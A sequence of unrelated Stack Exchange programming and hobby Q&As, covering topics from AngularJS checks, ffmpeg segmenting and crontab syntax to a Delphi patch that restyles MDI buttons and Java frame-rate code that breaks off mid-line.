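        return Math.max(wait, 0);                     // slow frame: skip sleeping entirely
    }

    public static void main(String[] args) {
        System.out.println(sleepMillis(4_000_000L, 60));   // fast 4 ms frame -> prints 12
        System.out.println(sleepMillis(20_000_000L, 60));  // slow 20 ms frame -> prints 0
    }
}
```

In the Update loop, the result of sleepMillis would replace the raw wait computation before the Thread.sleep(wait) call.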
Update multiple documents I want to update multiple documents in elasticsearch. The update should correspond to the SQL query UPDATE tablename SET expired=true where id not in (list_of_ids) Is it possible, or do you recommend a different solution for keeping track of active and inactive documents? I want to keep and use inactive documents for statistical purposes. Thanks This can be easily done with the update by query API, like this: POST index/_update_by_query { "script": { "inline": "ctx._source.expired = true" }, "query": { "bool": { "must_not": { "ids": { "values": [1, 2, 3, 4] } } } } } Thanks, that's the solution. In Python with elasticsearch I just had to execute es.update_by_query(index, doctype, body) where body is the JSON you provided.
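The Python call mentioned in the last comment can be sketched like this; the query body is a plain dict, so it can be built and inspected before sending (the endpoint and index name below are placeholder assumptions, not from the thread):

```python
# Sketch of the Python variant from the last comment. The update-by-query body
# is a plain dict mirroring the JSON above: mark every document whose id is
# NOT in the active list as expired.
def make_expire_body(active_ids):
    return {
        "script": {"inline": "ctx._source.expired = true"},
        "query": {"bool": {"must_not": {"ids": {"values": list(active_ids)}}}},
    }

# With the elasticsearch-py client (assumed installed), the call would be:
#   from elasticsearch import Elasticsearch
#   es = Elasticsearch("http://localhost:9200")   # placeholder endpoint
#   es.update_by_query(index="myindex", body=make_expire_body([1, 2, 3, 4]))
print(make_expire_body([1, 2])["query"]["bool"]["must_not"]["ids"]["values"])  # [1, 2]
```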
How to reshape a dataframe with duplicated rows into rownames and colnames I have been struggling with reshaping the following dataframe: geneSymbol <- c(rep("gene1",4),rep("gene2",4),rep("gene3",4)) Sample_name <- rep(c("sample1","sample2","sample3","sample4"),3) log2FC <- c(1.5,-1.0,0.5,0.2,-0.3,-0.7,-0.12,0.33,0.64,-0.17,2.3,-1.7) df <- data.frame(geneSymbol, Sample_name, log2FC) > df geneSymbol Sample_name log2FC 1 gene1 sample1 1.50 2 gene1 sample2 -1.00 3 gene1 sample3 0.50 4 gene1 sample4 0.20 5 gene2 sample1 -0.30 6 gene2 sample2 -0.70 7 gene2 sample3 -0.12 8 gene2 sample4 0.33 9 gene3 sample1 0.64 10 gene3 sample2 -0.17 11 gene3 sample3 2.30 12 gene3 sample4 -1.70 where the 'geneSymbol' and 'Sample_name' columns have duplicated rows for each. I have been trying to reshape this dataframe into a dataframe which has the 'geneSymbol' as its rownames and the 'Sample_name' as its colnames, which should look as follows: sample1 sample2 sample3 sample4 gene1 1.50 -1.00 0.50 0.20 gene2 -0.30 -0.70 -0.12 0.33 gene3 0.64 -0.17 2.30 -1.70 I manually created this table myself, but I have no idea which function I need to use to make this dataframe or table from df with lines of code, as I have hundreds of rows in my dataframe. I would really appreciate it if anyone can help me out with this.
Best wishes, TJ using tidyr: tidyr::pivot_wider(df,values_from = 'log2FC',names_from = 'Sample_name') geneSymbol sample1 sample2 sample3 sample4 gene1 1.5 -1 0.5 0.2 gene2 -0.3 -0.7 -0.12 0.33 gene3 0.64 -0.17 2.3 -1.7 xtabs(log2FC ~ geneSymbol + Sample_name, df) Sample_name geneSymbol sample1 sample2 sample3 sample4 gene1 1.50 -1.00 0.50 0.20 gene2 -0.30 -0.70 -0.12 0.33 gene3 0.64 -0.17 2.30 -1.70 Using acast library(reshape2) acast(df, geneSymbol ~ Sample_name, value.var = 'log2FC') sample1 sample2 sample3 sample4 gene1 1.50 -1.00 0.50 0.20 gene2 -0.30 -0.70 -0.12 0.33 gene3 0.64 -0.17 2.30 -1.70 Here is the data.table pendant using dcast: library(data.table) setDT(df) dcast(df, geneSymbol ~ Sample_name, value.var = "log2FC") geneSymbol sample1 sample2 sample3 sample4 1: gene1 1.50 -1.00 0.50 0.20 2: gene2 -0.30 -0.70 -0.12 0.33 3: gene3 0.64 -0.17 2.30 -1.70
wkhtmltopdf in Oracle Apex I am new to Oracle Apex CRM. I have an application where I need reports to be exported to PDF. I have worked on a .NET application and there I used wkhtmltopdf for exporting HTML to PDF. But I am not sure if I can use wkhtmltopdf in Oracle Apex. Can anyone tell me whether wkhtmltopdf is supported in Oracle Apex? Any reference? If you are using the Oracle Apex Interactive Report, the export-as-PDF feature is already available. You can use the search bar to download the report as PDF. This can be configured on the Report Attributes tab in an Interactive Reporting component. [Apex Interactive Report Action Options] Oracle Apex Interactive Report Configuration You can even create a link to directly download the report using the "PDF" request option as follows: your application url: http://example.com/apex/f?p=MYAPPID:MYPAGE:PDF let's say the Interactive Report is on page 6 of application id 100: http://example.com/apex/f?p=100:6:PDF If the wkhtmltopdf executable is visible to the server, you can create a job with DBMS_SCHEDULER. but my question is... can I use wkhtmltopdf in Oracle Apex? because I can't find any code reference/link where wkhtmltopdf is used in Oracle Apex @Mahajan344 You cannot directly call the application from Oracle Apex afaik, but you can call PL/SQL stored procedures in Oracle APEX, which will allow you to use DBMS_SCHEDULER. You must use PL/SQL and then you can call this in your page. But there is already a PDF download function in Apex. https://www.oracle.com/webfolder/technetwork/tutorials/obe/db/apex/r50/PDF%20Printing/Creating%20PDF%20Reports%20with%20Oracle%20Application%20Express%205.0%20and%20Oracle%20REST%20Data%20Services.html Hi, welcome to Stackoverflow!! It would be great if you could read these guidelines before answering any question. Thanks.
Issue with sending data to a webservice, with ksoap Good evening, I need your help. Until now, using my webservice to retrieve data, there was no problem. Even to receive data, I have to send some. Example: login. However, now I want to send data to the webservice, and it will only return "true or false". I know I have the necessary data, but it does not do what it is supposed to do. That is, the method I am invoking needs to receive data, and with that data it does the update in the database. I know it works manually, directly on the webservice. What might be wrong? Below is the code: After inserting the data in the Android app, when I click on a button, it does this (the message at the end is the way I know that I send real data): try { newpassword = newPass; Abreviatura = (EditText)findViewById(R.id.txtAbreviatura); newabreviatura = Abreviatura.getText().toString(); Nome = (EditText)findViewById(R.id.txtNome); newnome = Nome.getText().toString(); User = (EditText)findViewById(R.id.txtUsername); newusername = User.getText().toString(); rslt="START"; Caller c=new Caller(); c.newNome = newnome; c.newUser = newusername; c.newPass = newpassword; c.newAbrev = newabreviatura; c.oldusername = oldusername; c.ad=ad; c.join(); c.start(); while(rslt=="START") { try { Thread.sleep(10); }catch(Exception ex) { } } ad.setTitle("Alteração:"); ad.setMessage(BIQActivity.comando + ";" + newnome + ";" + newpassword + ";" + newabreviatura + ";" + newusername + ";" + oldusername); ad.show(); }catch(Exception ex) { } That function uses this piece of code to send data to the next code: csup=new CallSoapUpdatePerfil(); String resp=csup.CallUpdatePerfil(newUser, newNome, newPass, newAbrev, ldusername); Perfil.rslt = resp; Finally, this is the code that sends the data to the webservice: public class CallSoapUpdatePerfil { public final String SOAP_ACTION = "http://tempuri.org/UpdatePerfil"; public final String OPERATION_NAME = "UpdatePerfil"; public final String WSDL_TARGET_NAMESPACE =
"http://tempuri.org/"; public final String SOAP_ADDRESS = "http://<IP_ADDRESS>:80/BIQAndroid/BIQAndroid.asmx"; public String CallUpdatePerfil(String User, String Pass, String Nome, String Abrev, String oldusername) { SoapObject request = new SoapObject(WSDL_TARGET_NAMESPACE,OPERATION_NAME); PropertyInfo pi=new PropertyInfo(); pi.setName("User"); pi.setValue(User); pi.setType(String.class); request.addProperty(pi); pi=new PropertyInfo(); pi.setName("Pass"); pi.setValue(Pass); pi.setType(String.class); request.addProperty(pi); pi=new PropertyInfo(); pi.setName("Abrev"); pi.setValue(Abrev); pi.setType(String.class); request.addProperty(pi); pi=new PropertyInfo(); pi.setName("Nome"); pi.setValue(Nome); pi.setType(String.class); request.addProperty(pi); pi=new PropertyInfo(); pi.setName("oldusername"); pi.setValue(oldusername); pi.setType(String.class); request.addProperty(pi); SoapSerializationEnvelope envelope = new SoapSerializationEnvelope( SoapEnvelope.VER11); envelope.dotNet = true; envelope.setOutputSoapObject(request); HttpTransportSE httpTransport = new HttpTransportSE(SOAP_ADDRESS); Object response=null; try { httpTransport.call(SOAP_ACTION, envelope); response = envelope.getResponse(); } catch (Exception exception) { response=exception.toString(); } return response.toString(); } } If anyone can help... Regards. I already find the error. The error is about the name of parameter of webservice. :s Done. Thanks anyway.
Credit Memo - 'Email Copy of Credit Memo' how to set default ON How to set the 'Email Copy of Credit Memo' checkbox to a default value of checked? (So as to negate the requirement to check the box every time.) Is there any way to override the single input line within items.phtml, and not override the whole items.phtml template file? E.g.: I can see that the checkbox is defined in /app/design/adminhtml/default/default/template/sales/order/creditmemo/create/items.phtml and manually adding the checked html attribute to the input has the desired effect. Any way to easily override this from custom theme code? <label class="normal" for="send_email"><?php echo Mage::helper('sales')->__('Email Copy of Credit Memo') ?></label> <input id="send_email" name="creditmemo[send_email]" value="1" type="checkbox" checked/> Very useful: https://magento.stackexchange.com/questions/30590/how-do-i-rewrite-a-single-element-in-a-phtml-file
Postfix, dovecot, squirrelmail server able to send but not receive emails I have set up a mail server using this guide: https://www.ostechnix.com/setup-mail-server-using-postfixdovecotsquirrelmail-in-centosrhelscientific-linux-6-3-step-by-step/ The webmail allows sending emails between its own users, i.e. on the local machine, and to other servers like Gmail. But it cannot receive emails from the outside world. Here is what I have in /etc/postfix/main.cf: alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases command_directory = /usr/sbin compatibility_level = 2 daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 2 debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin ddd $daemon_directory/$process_name $process_id & sleep 5 home_mailbox = Maildir/ html_directory = no inet_interfaces = localhost inet_protocols = all mail_owner = postfix mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man meta_directory = /etc/postfix mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain mydomain = domain.com myhostname = mail.domain.com mynetworks = <IP_ADDRESS>/24, <IP_ADDRESS>/8, [::1]/128 myorigin = $mydomain newaliases_path = /usr/bin/newaliases.postfix queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix/README_FILES sample_directory = /usr/share/doc/postfix/samples sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop shlib_directory = /usr/lib64/postfix unknown_local_recipient_reject_code = 550 mydomain and myhostname are fake though. Also, our ISP shouldn't block any inbound SMTP connections on port 25, but we have to double-check that in the meantime. Please, advise! Update 14/11/2017: Enabled firewalld service once again and opened the mentioned ports. Now this error appears when trying to send an email on squirrelmail: Connection refused 111 Can't open SMTP stream.
Please help "Mydomain and myhostname are fake though" - How should the sending mailserver then be able to reach your mailserver? You need to use a publicly routable domain and have corresponding MX records defined for that domain that point to your mailserver. @Yerbol means that the variables mydomain and myhostname are fake only within the config file posted here The directive: inet_interfaces = localhost restricts Postfix to receiving mail on localhost. Try setting that to inet_interfaces = all to actually accept incoming connections from the internet as well. (And rather than completely disabling the firewall as in that recipe, open TCP port 25 (SMTP), 143 (IMAP) and 80/443 (HTTP/HTTPS) in your firewall and keep it enabled.) I also had to add my IP to the DNS server as smtp.domain.com so it can actually be found from the outside world, and add smtp.domain.com to the /etc/hosts file. I will enable the firewall as you suggested. Enabled firewalld service once again and opened the mentioned ports. Now this error appears when trying to send an email on squirrelmail: Connection refused 111 Can't open SMTP stream. Please help https://serverfault.com/questions/725262/what-causes-the-connection-refused-message
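As a config sketch, the two fixes suggested above look like this (assuming a stock CentOS box with firewalld; the port numbers are the ones listed in the answer):

```
# /etc/postfix/main.cf -- accept SMTP from the network, not just loopback
inet_interfaces = all

# firewalld: open the ports listed above instead of disabling the firewall
firewall-cmd --permanent --add-port=25/tcp      # SMTP
firewall-cmd --permanent --add-port=143/tcp     # IMAP
firewall-cmd --permanent --add-port=80/tcp --add-port=443/tcp   # webmail
firewall-cmd --reload

# restart postfix so the new inet_interfaces setting takes effect
systemctl restart postfix
```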
How to change Eclipse run script in QNX6? Related to another question, we want to change the eclipse run command. I found that eclipse can run by executing the script: /usr/qnx630/host/qnx6/x86/usr/bin/qde.sh But the startup configuration is not written there. The only thing the script does is execute the file: /usr/qnx630/host/qnx6/x86/usr/qde/eclipse/eclipse This file is a binary which ends up calling another one with all the startup parameters for Eclipse. So my question is: where can I find and change those parameters? Thank you for your time. I would first look at the eclipse.ini file to check if your startup configuration is not better expressed there. (That is one element for having a quicker eclipse.) In your case, it should be at: /usr/qnx630/host/qnx6/x86/usr/qde/eclipse/eclipse.ini If it is not there, you could create it. It would be detected by eclipse during launch.
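For reference, a minimal eclipse.ini sketch (values are illustrative assumptions, not QNX defaults): one option per line, and everything after -vmargs is passed to the JVM rather than to the launcher:

```
-showsplash
org.eclipse.platform
-vmargs
-Xms256m
-Xmx1024m
```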
What is "one-loop cosmological constant"? I'm following Witten's essay and I'm trying to understand the UV divergence. When he writes: In quantum field theory, this Feynman diagram with a single proper-time parameter τ, underlies the one-loop cosmological constant. Is this loop the same loop from Loop Quantum Gravity (LQG)? If the answer to the first question is yes, is the "one-loop cosmological constant" just the contribution of one loop in this theory to the cosmological constant? https://en.wikipedia.org/wiki/One-loop_Feynman_diagram e.g. figure 1 in the essay No, this has nothing to do with Loop Quantum Gravity (I removed the corresponding tag) This is just a long comment made with the intention of helping you discover the answer by yourself. Our goal is to compute the one-loop partition function for the closed string vacuum. That's relevant because the cosmological constant is an energy density, so it is natural to compute the (one-loop) partition function of the vacuum in order to define the expected (one-loop) correction to the free energy of the vacuum. Observation (1): There is only one Feynman diagram arising from the closed string sector that is relevant for this problem; that's because, by definition of "vacuum", we are assuming that no other perturbative or non-perturbative states (open strings, branes etc.) are present. The relevant Feynman diagram is the torus partition function with no punctures; the torus partition function arises as the one-loop (genus-one) closed string partition function, and the absence of punctures is the statement of the absence of asymptotic closed string states in a closed string vacuum. All this is done in detail in the book Introduction to Conformal Field Theory: With Applications to String Theory (chapter 4). Observation (2): The torus partition function depends on a particular modulus $\tau$, $Z_{torus}=Z_{torus}(\tau)$.
We want to preserve modular invariance (why?), but $Z_{torus}$ on its own is not modular invariant. The key is now to write the simplest modular invariant that can be written in terms of $Z_{torus}(\tau)$. Convince yourself that the answer is: $$\int_{Torus} \frac{d \tau d \bar{\tau}}{\operatorname{Im}(\tau)} Z_{torus}(\tau, \bar{\tau}),$$ if you have any doubts or want a first-principles derivation, consult the discussion around equation 4.1 in the book Introduction to Conformal Field Theory: With Applications to String Theory (chapter 4). Observation (3): Then, the one-loop cosmological constant in string theory is given as $$\Lambda \sim \int_{Torus} \frac{d \tau d \bar{\tau}}{\operatorname{Im}(\tau)} Z_{torus}(\tau, \bar{\tau}).$$
I'm sick and throwing up all over the place, what do I do? Here's the story, I was journeying down below and finding many new things to scarf on. I'm finding turnips, morsels, chops, it's a smorgasbord down there. I eventually came across some innards and gave that a try. Boy was that a mistake. I became sick the moment it hit my tongue. I was throwing up all over the place, it was hard to move around. And with creatures swarming me and attacking me, I barely made it out alive! I was like that for 30 seconds to a minute but it felt like it was for hours, maybe days. I tried drinking water and eating some food but it didn't help at all. I just hid in a corner healing my wounds until I recovered. But I didn't like that feeling, I don't ever want to feel like that again, so no more innards for me! But if I see another one down there, I can't guarantee that I've learned my lesson and I might just forget and eat it since it looks so good... If that ever happens again, what can I do to heal myself of being sick sooner?
Password must contain any one of the following criteria Password must contain any one of the following criteria 1) One uppercase 2) one lowercase 3) one number 4) one special character. If any three of the above criteria match, then the password is valid, like the formats below. 1) One number, one lower case alphabet, one uppercase alphabet ---> valid password or 2) one number, one lower case alphabet, and one special character ---> valid password or 3) one number, one uppercase alphabet, and one special character ---> valid password. Please help me write the regular expression for the above criteria. My requirement is any three combinations of one number, one alphabet, one special character. It's like a permutation/combination format. If I write the /(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[-._@^]).{8,16}/ format I need to verify so many conditions, so is there another way? Thanks in advance. I would guess that the reason your question is getting downvoted is because you haven't tried doing this yourself yet; have a go at it - read some regex - there are online tools to test your regex live and fix it. Try your best to get there and then ask for specific help if you run into issues. Thanks for your reply. I tried this: (?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[-._@^]).{8,12}, but it's a repetitive process. In this case I need to verify so many conditions. Post your code, and describe the problem in it. Is the order of the pswd chars important for you?
The order is not mandatory. If the order of the pswd chars is not important, then: One number, one lower case alphabet, one uppercase alphabet ---> valid password: \d[a-z][A-Z] One number, one lower case alphabet, and one special character ---> valid password: \d[a-z][\[\\\^\$\.\|\?\*\+\(\)] One number, one uppercase alphabet, and one special character ---> valid password: \d[A-Z][\[\\\^\$\.\|\?\*\+\(\)] So if it's combined in one regex: (\d[a-z][A-Z])|(\d[a-z][\[\\\^\$\.\|\?\*\+\(\)])|(\d[A-Z][\[\\\^\$\.\|\?\*\+\(\)]) Check it up here Thanks for your reply. I need any three combinations; then I consider the password a valid password. If my password is raj then it's not a valid password. If my password is Ra1 then it's not a valid password, etc... Assuming your special characters are [\^$.|?*+() 1) One number, one lower case alphabet, one uppercase alphabet ---> valid password [0-9][a-z][A-Z] or 2) one number, one lower case alphabet, and one special character ---> valid password [0-9][a-z][\[\\\^\$\.\|\?\*\+\(\)] or 3) one number, one uppercase alphabet, and one special character ---> valid password. [0-9][A-Z][\[\\\^\$\.\|\?\*\+\(\)] Combine them with OR (|) [0-9][a-z][A-Z]|[0-9][a-z][\[\\\^\$\.\|\?\*\+\(\)]|[0-9][A-Z][\[\\\^\$\.\|\?\*\+\(\)] I tried the above format but there is still an issue. My requirement is any three combinations of one number, one alphabet, one special character. It's like a permutation/combination format.
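Since the actual requirement is "at least three of the four classes", a counting check avoids enumerating every class combination in one regex. A sketch in Python (the special-character set [-._@^] and the 8-16 length come from the question's own pattern; everything else is an assumption):

```python
import re

# Counting check: a password is valid when at least 3 of the 4 character
# classes appear and the length is 8-16. The special set [-._@^] and the
# length bounds are taken from the question's own pattern.
CLASSES = [r"[a-z]", r"[A-Z]", r"\d", r"[-._@^]"]

def is_valid(pw):
    if not 8 <= len(pw) <= 16:
        return False
    return sum(bool(re.search(c, pw)) for c in CLASSES) >= 3

print(is_valid("Passw0rd"))   # upper + lower + digit   -> True
print(is_valid("passw0rd."))  # lower + digit + special -> True
print(is_valid("password"))   # lower case only         -> False
```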
Sql - How to update a column for all rows? $sql = "UPDATE debtorsmaster SET name='" . $_POST['CustName'] . "', address1='" . $_POST['Address1'] . "', address2='" . $_POST['Address2'] . "', address3='" . $_POST['Address3'] . "', How to change this to update all rows Like that (except for the trailing ,), but preferably via using prepared statements and actually executing :) But this does update all rows in the table. That is not normally what one wants, but that is what your query does. Without a WHERE clause, you'll update all rows. BTW learn about prepared statements Looks like that is not the whole statement, because the last character is a comma As there is no WHERE clause, the same statement can be used to update all the rows... you only need to remove the trailing , Actually this UPDATE is updating the columns name, address1, address2, address3 for all the rows in the table debtorsmaster. And as people commented, without a WHERE clause you are updating all the rows; very rarely do you want to do that. Because you're not adding a WHERE clause all the rows will be updated. As noted in the above comments you have a trailing , which causes the query to be invalid. Also it's advised to use prepared statements to prevent SQL injection. $statement = $db->prepare("UPDATE `debtorsmaster` SET `name`=?, `address1`=?, `address2`=?, `address3`=?"); $statement->bind_param("ssss", $customerName, $address1, $address2, $address3); $customerName = $_POST['CustName']; $address1 = $_POST['Address1']; $address2 = $_POST['Address2']; $address3 = $_POST['Address3']; $statement->execute(); EDIT: Above example is based on mysqli.
Hosting control panel with Java EE Application Server support? I currently have WHM/cPanel on my server, but it doesn't integrate properly with any Java EE App Server. I installed Tomcat manually, and have made it work through Apache, but the configuration is more fragile than I'd like. So, I'm trying to find a replacement where a Java EE App Server can be properly integrated & managed. Requirements: Open Source / Free Software (i.e. not proprietary) Runs on CentOS (although, Debian/Fedora Core/FreeBSD are options if necessary) Supports Apache + Tomcat (or equivalent) Self-monitoring (e.g. auto-restarts MySQL if it falls over) User account management (easy setup, limit space & bandwidth quotas, etc) Friendly end-user control panel (for configuring db, mail, stats, logs, etc) Anything obvious I've forgotten. Are there any recommended software packages which do all of this? http://faq.cpanel.net/show.cgi?qa=120310982800498 http://www.apluskb.com/scripts/How_do_I_manage_my_answer2108.html cPanel claims to support Tomcat, but it doesn't actually work properly. (Although I've not actually tested with the latest cPanel releases). Plesk is not supported by my provider, so I would need to purchase it myself, and it is ridiculously expensive. I recently found OpenPanel and it looked potentially interesting, but I've not yet had a chance to investigate it further. Kloxo is another interesting and Open Source (AGPL3) one that I need to investigate further - doesn't directly support Tomcat, but still plays nice with it. Plesk is a commercial hosting management suite similar to cPanel; in fact most hosting providers who offer WHM/cPanel also offer Plesk, which has built-in Tomcat support. Plesk runs natively on CentOS but it is only free for use on one domain. That last bit is the problem - needs to support lots of domains! We have been using Apache Geronimo here at work for about two years and it has been rock solid.
It has its own built-in control panel that allows us to deploy/start/stop each app separately. You may want to give it a try. I couldn't see anything about user account management and monitoring other services (e.g. MySQL) - is this done with a GBean or some other method?
How to Find specific text in a formula in Multiple Columns (based on Column Header Names) and replace with different text I am trying to make below code to work so that I can: Find specific text "AMJ" in Formulas in specific Columns with Header Names: "RmRf" and "UMD" Then once "AMJ" is found, it should be replaced with "ABC" Most of the code that I have read (whilst searching for solution to above) use column numbers instead of column headers, but my worksheet will be updated every month, so column numbers will change and that's why I would like to use column header names (in this case "RmRf" and "UMD") Public Sub FindAndConvert() Dim i As Integer Dim lastRow As Long Dim myRng As Range Dim mycell As Range Dim MyColl As Collection Dim myIterator As Variant Set MyColl = New Collection MyColl.Add "RmRf" MyColl.Add "UMD" lastRow = ActiveSheet.Cells.Find("*", SearchOrder:=xlByRows, SearchDirection:=xlPrevious).Row For i = 1 To 2000 For Each myIterator In MyColl If Cells(1, i) = myIterator Then Set myRng = Range(Cells(2, i), Cells(lastRow, i)) For Each mycell In myRng.SpecialCells(xlFormulas) mycell.Formula = Replace(mycell.Formula, "AMJ", "ABC") Next End If Next Next End Sub Why not just use Range.Replace? You have 3 loops, that's why your code takes so long to run. Ok, so it looks like the above code actually works - but it took a very long time to run - I think over 15 mins and this does not make sense as I could have done a manual find and replace for the above two columns much more quickly. The two columns "RmRf" and "UMD" are columns ATF and ATG in respectively in my sheet, so in above code I think I needed to use i = 1 To 2000 (as ATF is column number 1202 and ATG is 1203). Do you know what if anything can be done to achieve the same outcome but have the code run much faster (but still use Column Header Names)? You don't need a loop at all. Use Application.Match to find the column by header. Thank you for the Range.Replace suggestion. 
I am new to VBA, could I modify the above code so that it uses Range.Replace, or would I need different code? You'd have to get rid of the loop approach, so that would be a significant modification. But, as noted, you don't need to loop. Thanks - I can see where the loops are in the code, so I can remove them, but I will need to do more research to try to figure out how to incorporate the Application.Match and Range.Replace suggestions so that I can make this work
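A sketch (untested, and the sub name is hypothetical) combining the two suggestions above: Application.Match locates each header in row 1, and a single Range.Replace per column removes the per-cell loop entirely, which is where the 15 minutes were going:

```vb
' Untested sketch (sub name is hypothetical) combining both suggestions:
' Application.Match finds each header in row 1, then a single Range.Replace
' rewrites the whole column -- no per-cell loop.
Public Sub FindAndConvertFast()
    Dim hdr As Variant, col As Variant
    For Each hdr In Array("RmRf", "UMD")
        ' Match returns an error value when the header is not found
        col = Application.Match(hdr, ActiveSheet.Rows(1), 0)
        If Not IsError(col) Then
            ActiveSheet.Columns(CLng(col)).Replace What:="AMJ", _
                Replacement:="ABC", LookAt:=xlPart
        End If
    Next hdr
End Sub
```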
How to add lateinit var on extension property What I am trying to do is extend all my actual Fragments by adding another custom class. The problem is that we cannot inherit from 2 different classes, right? So I am trying to add extension properties by adding: var Fragment.isFocused by Delegates.notNull<Boolean>(false) fun Fragment.setFocusListenerOn(rootView: View) { rootView.onFocusChangeListener = View.OnFocusChangeListener { v, hasFocus -> this.isFocused = hasFocus } } Why? Because I need to know which Fragment is on top of my BottomNavigation. Note: each buttomNavFrag is another navigation. So, I added this function to listen for the back button: override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) val callback = requireActivity().onBackPressedDispatcher.addCallback(this) { findNavController().navigateUp() } } The problem is that if you are on the second Fragment of all navGraphs, and you click back, all Fragments will listen to the back button. In other words, all navGraphs will return to their first Fragment... So, before the navigateUp, I would like to add: if (isFocused) But how do I make it work? EDIT: The thing I want to solve is: I have multiple web-based Fragments that extend a class that I added as abstract, with code like the following: val callback = requireActivity().onBackPressedDispatcher.addCallback(this) { if (webview.canGoBack()) webview.goBack() else onBackPressed() } I only want to navigate back in the webview (if the webview can go back) whenever the user clicks the back button, and only if the user is on that specific Fragment. What happens is that only one Fragment (actually the first added) is listening to those changes, instead of all the web-based Fragments. If you create an extension property that has a backing field or a delegate, as you have, it is a static backing field or delegate, meaning it is shared by all instances of the class.
This is because it is not possible to add members to a class without subclassing it on the JVM. You will need to subclass Fragment and use your subclass as the base class for all your Fragments. That, or some complicated strategy where there is a backing map of Fragments to their states, and you add lifecycle listeners to the Fragments to remove them from the map when they are destroyed. But for your specific use case, it would probably be easiest to simply check for the currently focused view each time you access the property: val Fragment.isFocused: Boolean get() = activity?.currentFocus == rootView && rootView != null Though I haven't messed with focus in this way, and I don't know if your fundamental strategy for navigation is flawed. I don't know if checking just the root view will help. And I don't know what you're doing with your callback. Ok. Thanks for clarifying. So I edited the question. I am not sure if it is because of another static field or because they share the property, so only the first element is listening instead of all of them.
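The "backing map" strategy mentioned above can be sketched as follows (a rough illustration, not Android-tested; Any stands in for Fragment to keep the sketch self-contained, and a WeakHashMap lets entries be collected with their receivers instead of wiring up lifecycle listeners):

```kotlin
import java.util.WeakHashMap

// One shared map, but one entry PER INSTANCE -- unlike a delegate-backed
// extension property, whose backing delegate is static and shared.
// `Any` stands in for Fragment here to keep the sketch self-contained.
private val focusedState = WeakHashMap<Any, Boolean>()

var Any.isFocusedExt: Boolean
    get() = focusedState[this] ?: false
    set(value) { focusedState[this] = value }
```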
common-pile/stackexchange_filtered
Linear regression in theano What is the significance of T.mean in this example? I think T.mean would have made sense if the implementation were vectorized. Here the inputs x and y to train(x, y) are scalars, cost only finds the squared error of a single input, and the loop iterates over the data.

cost = T.mean(T.sqr(y - Y))
gradient = T.grad(cost=cost, wrt=w)
updates = [[w, w - gradient * 0.01]]

train = theano.function(inputs=[X, Y], outputs=cost, updates=updates, allow_input_downcast=True)
for i in range(100):
    for x, y in zip(trX, trY):
        train(x, y)

print w.get_value()

Removing T.mean had no impact on the output pattern. You are right, T.mean has no significance here. The cost function operates on a single training sample at once, so the "mean squared error" is really just the squared error of the sample. This example implements linear regression via stochastic gradient descent, an algorithm for online optimization. SGD iterates over samples one-by-one, as is the case in this example. However, in more complex scenarios, the dataset is often processed in mini-batches, which gives better performance and convergence properties. I think that T.mean was left in the example as an artifact of mini-batch gradient descent, or to make it more explicit that the cost function is MSE.
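To illustrate the answer's point, here is a hedged NumPy sketch (not the original Theano code; the data and learning rates are made up for illustration) contrasting the two regimes: with a single sample, the mean inside the cost is a no-op, while over a mini-batch it genuinely averages the per-sample gradients:

```python
import numpy as np

def grad_mse(w, x, y):
    # Gradient of mean((w*x - y)^2) with respect to the scalar weight w.
    # For a length-1 array the mean is the identity, which mirrors the
    # single-sample case discussed above.
    residual = w * x - y
    return np.mean(2.0 * residual * x)

x = np.array([0.5, -1.0, 1.5, 2.0, -0.5, 1.0, -1.5, 0.25])
y = 3.0 * x  # true slope is 3, no noise

# Single-sample SGD, as in the Theano example: one pass, tiny steps.
w_sgd = 0.0
for xi, yi in zip(x, y):
    w_sgd -= 0.01 * grad_mse(w_sgd, np.array([xi]), np.array([yi]))

# Full-batch gradient descent: here the mean actually averages over samples.
w_batch = 0.0
for _ in range(200):
    w_batch -= 0.1 * grad_mse(w_batch, x, y)

print(w_sgd, w_batch)  # w_batch converges to the true slope 3
```

Dropping `np.mean` in the single-sample case changes nothing, exactly as observed; in the batch case it rescales the gradient by the batch size, which is why it is conventionally kept in the cost.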
Black and white icons in Visual Studio 2012 Usually the icon files (ico/bmp/png) for controls in the Visual Studio Toolbox are embedded into the assembly as resource files. System.Windows.Forms.dll seems to have the icon files that are colored, and they are for VS2010 and lower. Where does VS2012 load the black-and-white icons for toolbox controls from? Also, is there a guideline on how to create this set of icons for VS2012, since the icons should look good in both the light and dark themes of VS2012. Thanks! -Datte They are not black-and-white, they have shades of gray. Pretty sure that VS2012 just re-colors the bitmap image. It's not quite so simple as creating some icons for each color theme. The icons are actually built from glyphs and color-adjusted at runtime based on the theme. Have a look at the Visual Studio Dark Theme blog post where the team talks about themed icons to get an understanding of the approach they've taken. To quote the important detail: All of our Visual Studio 11 icons are maintained in an icon repository as vector graphic files To answer the follow-up question you may have, I'm not sure where the vector graphics are stored. It looks like they're scattered across a myriad of DLLs. I found Resources Extract (http://www.nirsoft.net/utils/resources_extract.html) to be very helpful in recursively exporting icons from DLLs. In my quest to un-metro Visual Studio I've found that the basic toolbox icons for HTML (MVC & Web Forms) and Win Forms are stored as bitmap resources in a number of unmanaged DLLs. WPF and others are stored mostly as PNG and ICO files in the newer managed DLLs. The managed resources are a combo of directly embedded files as well as serialized Bitmaps, PNGs, Icons, Image List Streams, and binary Streams.
Take a look in these files for most of the toolbox images:

\Microsoft Visual Studio 11.0\Common7\IDE\1033\Microsoft.VisualStudio.Windows.FormsUI.dll
\Microsoft Visual Studio 11.0\Common7\Packages\htmled.dll

As for how the color is modified, it looks like Visual Studio replaces white with black, along with changing shades of white/grey to their darker counterparts while leaving the rest of the color alone. In years past they've included a style guideline document along with the SDK. I haven't found one yet for 2012 and their MSDN link still points to the 2010 document.
